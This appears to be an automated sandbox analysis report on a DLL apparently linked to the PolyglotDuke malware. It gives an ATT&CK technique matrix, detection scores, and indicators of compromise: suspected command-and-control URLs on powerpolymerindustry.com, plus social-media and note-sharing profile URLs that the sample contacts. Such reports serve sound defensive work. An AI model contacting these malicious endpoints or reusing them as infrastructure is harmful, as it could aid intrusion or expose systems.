Source: C:\Windows\System32\rundll32.exeCode function: 2_2_6770334C malloc,lstrcpyA,free,GetUserNameW,lstrlenW,GetVolumeInformationW,wsprintfA,2_2_6770334C
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_677085A4 HeapCreate,GetVersion,HeapSetInformation,2_2_677085A4
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1Application Shimming1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery14Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
unmapped_executable_of_polyglot_duke.dll12%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://simp.ly/publish/pBn8JtwuU0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8Jtmwud0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?pf=8R2GuB&title=NhcEZi4o%0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?var=Qg2&term=2MbNQAG1ZO2mP0%Avira URL Cloudsafe
https://pki.goog/repository0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8JtwuK0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8JtwuP0%Avira URL Cloudsafe
http://cps.root-x1s&0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8Jtwu?0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?pf=8R2GuB&title=NhcEZi4o00%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?view=Po&pf=A91dkCTCQGqIVNleM0%Avira URL Cloudsafe
https://dwo3ckksxlb0v.cloudfront.net;0%Avira URL Cloudsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://simp.ly/publish/pBn8Jtoft0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?view=Po&pf=A91dkCTCQGqIVN0%Avira URL Cloudsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
http://simp.ly/publish/pBn8Jtwud0%Avira URL Cloudsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://powerpolymerindustry.com/main.php?var=Qg2&term=2MbNQAG1ZO2m60%Avira URL Cloudsafe
http://apps.identrust.0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?pflo=c2&placement=K3NnasaV0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?l=shoPtH&extra=CBBZN3mZYAwud0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?page=szgS&l=2S6pQoJz0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8Jtwu0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8Jtcom/np8j7ovqdl0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8JtyP0%Avira URL Cloudsafe
http://crl3.digicert.c0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8Jtf000d2cy0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?oldid=VLi&view=x104HDdyexE0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8JtG1ZO2m0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?view=pS14S6C&id=b2V1I1GxRli0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?status=PV&item_id=Uis4fbiPBc97A0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?page=hih994P&oldid=MkhNLlu3ug0%Avira URL Cloudsafe
http://simp.ly/publish/pBn8Jtf000d2cL0%Avira URL Cloudsafe
http://powerpolymerindustry.com/main.php?view=pS14S6C&id=b2V1I1GxRlP0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
thinkery.me
5.9.110.84
truefalse
    		high
    twitter.com
    		104.244.42.1
    		truefalse
      		high
      mobile.twitter.com
      		104.244.42.70
      		truefalse
        		high
        app.simplenote.com
        		216.239.32.21
        		truefalse
          		high
          simp.ly
          		192.0.84.247
          		truetrue
            		unknown
            www.fotolog.com
            		172.67.204.156
            		truefalse
              		high
              powerpolymerindustry.com
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://twitter.com/np8j7ovqdlfalse
                  		high
                  http://www.fotolog.com/vz1g3wmwufalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://simp.ly/publish/pBn8JtwuUrundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://simp.ly/publish/pBn8Jtmwudrundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://app.simplenote.com/publish/pBn8Jtver8rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmpfalse
                      		high
                      https://thinkery.me/yptographyrundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                        		high
                        https://cm.g.doubleclick.netrundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.581389396.000001DEAA2F9000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpfalse
                          		high
                          http://powerpolymerindustry.com/main.php?pf=8R2GuB&title=NhcEZi4o%rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://powerpolymerindustry.com/main.php?var=Qg2&term=2MbNQAG1ZO2mPrundll32.exe, 00000002.00000003.375687263.000001DEA854C000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pki.goog/repositoryrundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://thinkery.me/vqdloviderrundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpfalse
                            		high
                            https://www.fotolog.com/vz1g3wmwu/pBn8Jtcharset=utf-8rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpfalse
                              		high
                              https://thinkery.me/billywilliams/5a0170161cb602262f000d2c)rundll32.exe, 00000002.00000002.578601154.000001DEA84FC000.00000004.00000020.sdmpfalse
                                		high
                                http://simp.ly/publish/pBn8JtwuKrundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://twitter.com/np8j7ovqdl8j7ovqdlXrundll32.exe, 00000002.00000003.387482062.000001DEA8564000.00000004.00000001.sdmpfalse
                                  		high
                                  http://simp.ly/publish/pBn8JtwuPrundll32.exe, 00000002.00000003.394525573.000001DEA854C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://twitter.com/np8j7ovqdlblednrundll32.exe, 00000002.00000003.387482062.000001DEA8564000.00000004.00000001.sdmpfalse
                                    		high
                                    https://www.fotolog.com/4rundll32.exe, 00000002.00000003.547487384.000001DEA8549000.00000004.00000001.sdmpfalse
                                      		high
                                      https://upload.twitter.comrundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpfalse
                                        		high
                                        https://www.fotolog.com/2rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                                          		high
                                          http://cps.root-x1s&rundll32.exe, 00000002.00000003.450148657.000001DEA8568000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://twitter.com/np8j7ovqdl8j7ovqdlXrundll32.exe, 00000002.00000003.396956681.000001DEA8568000.00000004.00000001.sdmpfalse
                                            		high
                                            http://simp.ly/publish/pBn8Jtwu?rundll32.exe, 00000002.00000003.356535725.000001DEA854C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://app.simplenote.com/publish/pBn8Jticrundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmpfalse
                                              		high
                                              https://thinkery.me/billywilliams/5a0170161cb602262f000d2cy-policy:rundll32.exe, 00000002.00000003.543376737.000001DEAA273000.00000004.00000001.sdmpfalse
                                                		high
                                                http://powerpolymerindustry.com/main.php?pf=8R2GuB&title=NhcEZi4o0rundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://powerpolymerindustry.com/main.php?view=Po&pf=A91dkCTCQGqIVNleMrundll32.exe, 00000002.00000002.581114906.000001DEAA2AD000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://app.simplenote.com/publish/pBn8Jto-cacherundll32.exe, 00000002.00000003.367356640.000001DEA854C000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://app.simplenote.com/publish/pBn8JtverNrundll32.exe, 00000002.00000003.440843459.000001DEA855C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://dwo3ckksxlb0v.cloudfront.net;rundll32.exe, 00000002.00000002.581005966.000001DEAA298000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.578685625.000001DEA854C000.00000004.00000020.sdmp, rundll32.exe, 00000002.00000003.547487384.000001DEA8549000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508632369.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.416271346.000001DEA8545000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450020972.000001DEAA29B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.581389396.000001DEAA2F9000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.fotolog.com/vz1g3wmwurrundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://twitter.com/np8j7ovqdltext/html;rundll32.exe, 00000002.00000003.434080337.000001DEAA273000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://cps.letsencrypt.org0rundll32.exe, 00000002.00000003.387437012.000001DEA857E000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fotolog.com/vz1g3wmwunrundll32.exe, 00000002.00000003.416278812.000001DEA854D000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://thinkery.me/billywilliams/5a0170161cb602262f000d2cwuPrundll32.exe, 00000002.00000003.373967961.000001DEA854C000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://simp.ly/publish/pBn8Jtoftrundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fotolog.com/vz1g3wmwumrundll32.exe, 00000002.00000003.411947706.000001DEA8568000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.373984343.000001DEA8563000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://mobile.twitter.com/4rundll32.exe, 00000002.00000003.477264881.000001DEA853F000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://powerpolymerindustry.com/main.php?view=Po&pf=A91dkCTCQGqIVNrundll32.exe, 00000002.00000002.581114906.000001DEAA2AD000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fotolog.com/rundll32.exe, 00000002.00000003.324911783.000001DEA855E000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://ocsp.pki.goog/gsr202rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://pki.goog/repository/0rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://bnc.ltrundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://mobile.twitter.com/np8j7ovqdl8Jrundll32.exe, 00000002.00000003.426898633.000001DEAA276000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://twitter.com/np8j7ovqdleucorundll32.exe, 00000002.00000003.416278812.000001DEA854D000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.fotolog.com/vz1g3wmwuyrundll32.exe, 00000002.00000003.547487384.000001DEA8549000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://thinkery.me/rss.php?username=&private=iFNY6FbeiERVfmL0rundll32.exe, 00000002.00000003.327475855.000001DEA8561000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://twitter.com/np8j7ovqdlllcrundll32.exe, 00000002.00000003.387444095.000001DEA854D000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://twitter.com/np8j7ovqdlish/pBn8Jtcb602262f000d2crundll32.exe, 00000002.00000003.434090332.000001DEAA276000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://twitter.com/np8j7ovqdlllZrundll32.exe, 00000002.00000003.396762832.000001DEA8548000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://www.fotolog.com/wp-json/rundll32.exe, 00000002.00000003.543342570.000001DEAA267000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.450046492.000001DEA853F000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://twitter.com/np8j7ovqdlwurundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://simp.ly/publish/pBn8Jtwudrundll32.exe, 00000002.00000003.458760849.000001DEA853F000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://crl.pki.goog/gsr2/gsr2.crl0?rundll32.exe, 00000002.00000003.405352424.000001DEA857D000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://mdhdsnappytv-vh.akamaihd.netrundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://powerpolymerindustry.com/main.php?var=Qg2&term=2MbNQAG1ZO2m6rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://apps.identrust.rundll32.exe, 00000002.00000003.423600045.000001DEA8568000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://app.simplenote.com/publish/pBn8Jtcharset=utf-8rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://powerpolymerindustry.com/main.php?pflo=c2&placement=K3NnasaVrundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://www.fotolog.com/rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.549645041.000001DEA855D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://app.simplenote.com/publish/pBn8Jtpe:rundll32.exe, 00000002.00000003.434090332.000001DEAA276000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://mobile.twitter.com/np8j7ovqdlml;rundll32.exe, 00000002.00000003.383402482.000001DEA8556000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://powerpolymerindustry.com/main.php?l=shoPtH&extra=CBBZN3mZYAwudrundll32.exe, 00000002.00000003.338388994.000001DEA854D000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://powerpolymerindustry.com/main.php?page=szgS&l=2S6pQoJzrundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://vmapstage.snappytv.comrundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://pay.twitter.comrundll32.exe, 00000002.00000003.416418693.000001DEA8542000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://simp.ly/publish/pBn8Jtwurundll32.exe, 00000002.00000003.336654500.000001DEA8568000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://twitter.com/np8j7ovqdlj7ovqdlrundll32.exe, 00000002.00000003.405285136.000001DEA854D000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://twitter.com/verrundll32.exe, 00000002.00000003.508575416.000001DEA854D000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://mobile.twitter.com/rundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://twitter.com/np8j7ovqdl7ovqdl70161cb602262f000d2crundll32.exe, 00000002.00000003.449995229.000001DEAA276000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://simp.ly/publish/pBn8Jtcom/np8j7ovqdlrundll32.exe, 00000002.00000003.356535725.000001DEA854C000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://simp.ly/publish/pBn8JtyPrundll32.exe, 00000002.00000003.336636841.000001DEA854C000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.fotolog.com/vz1g3wmwuvqdl70161cb602262f000d2crundll32.exe, 00000002.00000003.423757010.000001DEAA276000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://thinkery.me/billywilliams/5a0170161cb602262f000d2cy0rundll32.exe, 00000002.00000003.440817199.000001DEA8548000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://thinkery.me/rundll32.exe, 00000002.00000003.467360767.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://crl3.digicert.crundll32.exe, 00000002.00000003.387482062.000001DEA8564000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://simp.ly/publish/pBn8Jtf000d2cyrundll32.exe, 00000002.00000003.403411650.000001DEA854C000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://thinkery.me/billywilliams/5a0170161cb602262f000d2cmobile.twitter.com8rundll32.exe, 00000002.00000002.578601154.000001DEA84FC000.00000004.00000020.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://snappytv-vh.akamaihd.netrundll32.exe, 00000002.00000003.550021029.000001DEA853F000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://powerpolymerindustry.com/main.php?oldid=VLi&view=x104HDdyexErundll32.exe, 00000002.00000003.338412221.000001DEA855C000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://simp.ly/publish/pBn8JtG1ZO2mrundll32.exe, 00000002.00000003.387444095.000001DEA854D000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://thinkery.me/billywilliams/5a0170161cb602262f000d2c7Xrundll32.exe, 00000002.00000002.578424792.000001DEA8480000.00000004.00000020.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.fotolog.com/Wrundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://powerpolymerindustry.com/main.php?view=pS14S6C&id=b2V1I1GxRlirundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.fotolog.com/Mrundll32.exe, 00000002.00000003.549645041.000001DEA855D000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://scontent.xx.fbcdn.netrundll32.exe, 00000002.00000003.365571089.000001DEA854C000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.403527373.000001DEA8575000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000002.581389396.000001DEAA2F9000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.320997528.000001DEA8561000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.346339929.000001DEA854D000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.384676127.000001DEAA27B000.00000004.00000001.sdmp, rundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.fotolog.com/Nrundll32.exe, 00000002.00000003.458785935.000001DEA855C000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.fotolog.com/vz1g3wmwuppytv-vh.akamaihd.netrundll32.exe, 00000002.00000003.356545949.000001DEA855D000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://app.simplenote.com/publish/pBn8Jtrundll32.exe, 00000002.00000003.450097224.000001DEA8547000.00000004.00000001.sdmp, pBn8Jt[1].htm1.2.drfalse
                                                                                                                                    		high
                                                                                                                                    http://powerpolymerindustry.com/main.php?status=PV&item_id=Uis4fbiPBc97Arundll32.exe, 00000002.00000003.423445511.000001DEA8548000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://powerpolymerindustry.com/main.php?page=hih994P&oldid=MkhNLlu3ugrundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://www.fotolog.com/vz1g3wmwum3rundll32.exe, 00000002.00000003.373984343.000001DEA8563000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://thinkery.me/rss.php?username=&private=I9UpaIT11nHBUq0irundll32.exe, 00000002.00000003.416402885.000001DEAA28D000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://mpdhdsnappytv-vh.akamaihd.netrundll32.exe, 00000002.00000003.508853259.000001DEAA26B000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://mobile.twitter.com/np8j7ovqdl70161cb602262f000d2crundll32.exe, 00000002.00000003.440742585.000001DEAA276000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://simp.ly/publish/pBn8Jtf000d2cLrundll32.exe, 00000002.00000003.450148657.000001DEA8568000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://app.simplenote.com/publish/pBn8Jth/pBn8Jterrundll32.exe, 00000002.00000002.578601154.000001DEA84FC000.00000004.00000020.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://powerpolymerindustry.com/main.php?view=pS14S6C&id=b2V1I1GxRlPrundll32.exe, 00000002.00000003.550405948.000001DEA84FC000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://www.fotolog.com/xmlrpc.phprundll32.exe, 00000002.00000003.324886403.000001DEA8561000.00000004.00000001.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                5.9.110.84
                                                                                                                                                		unknownGermany
                                                                                                                                                		24940HETZNER-ASDEfalse
                                                                                                                                                172.67.204.156
                                                                                                                                                		unknownUnited States
                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                104.244.42.1
                                                                                                                                                		unknownUnited States
                                                                                                                                                		13414TWITTERUSfalse
                                                                                                                                                216.239.32.21
                                                                                                                                                		unknownUnited States
                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                192.0.84.247
                                                                                                                                                		unknownUnited States
                                                                                                                                                		2635AUTOMATTICUStrue
                                                                                                                                                104.244.42.70
                                                                                                                                                		unknownUnited States
                                                                                                                                                		13414TWITTERUSfalse
                                                                                                                                                104.244.42.6
                                                                                                                                                		unknownUnited States
                                                                                                                                                		13414TWITTERUStrue

                                                                                                                                                Private

                                                                                                                                                IP
                                                                                                                                                192.168.2.1

